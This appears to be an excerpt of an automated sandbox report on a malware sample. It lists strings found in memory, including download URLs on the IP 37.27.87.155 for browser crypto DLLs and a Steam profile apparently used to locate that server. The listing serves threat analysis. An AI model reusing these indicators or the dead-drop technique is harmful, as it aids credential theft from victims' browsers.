                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://ocsp.digicert.com0N
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: RegAsm.exe, RegAsm.exe, 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2071759889.0000000019E7D000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.5.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                        Source: 76561199673019888[1].htm.5.drString found in binary or memory: https://37.27.87.155
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/%
                        Source: RegAsm.exe, 00000005.00000002.2066860045.0000000001669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/%-
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/:
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/B
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/C
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/J
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/N
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/Q
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/ata
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/et
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/freebl3.dll
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/freebl3.dllr
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000016A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/ig
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/mozglue.dll
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/mozglue.dll8
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/msvcp140.dll
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/nes
                        Source: RegAsm.exe, 00000005.00000002.2066860045.0000000001669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/nss3.dll
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/softokn3.dll
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/softokn3.dllX
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/sqln.dll
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/vcruntime140.dll
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/vcruntime140.dll&
                        Source: RegAsm.exe, 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.1550e3a617e50bnt-Disposition:
                        Source: RegAsm.exe, 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155AFBKF
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155AKEHI
                        Source: GDHIEHJE.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: 76561199673019888[1].htm.5.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                        Source: GDHIEHJE.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: GDHIEHJE.5.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: GDHIEHJE.5.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHly8&a
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=Kg_v7CMM
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=N0D1
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jU8h8CqVh6FY&l=e
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                        Source: 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=BMF068jICwP9&
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                        Source: GDHIEHJE.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: GDHIEHJE.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: GDHIEHJE.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://help.steampowered.com/en/
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: https://mozilla.org0/
                        Source: 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/QFp
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/discussions/
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                        Source: 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199673019888
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/market/
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                        Source: file.exe, file.exe, 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000005.00000002.2066860045.000000000159E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888$aM
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/badges
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/inventory/
                        Source: file.exe, 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888ve74rMozilla/5.0
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/workshop/
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/yF
                        Source: 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/
                        Source: 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/about/
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/explore/
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/legal/
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/mobile
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/news/
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/points/shop/
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/stats/
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                        Source: JJJDGIECFCAKKFHIIIJEGDHIIE.5.drString found in binary or memory: https://support.mozilla.org
                        Source: JJJDGIECFCAKKFHIIIJEGDHIIE.5.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: JJJDGIECFCAKKFHIIIJEGDHIIE.5.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
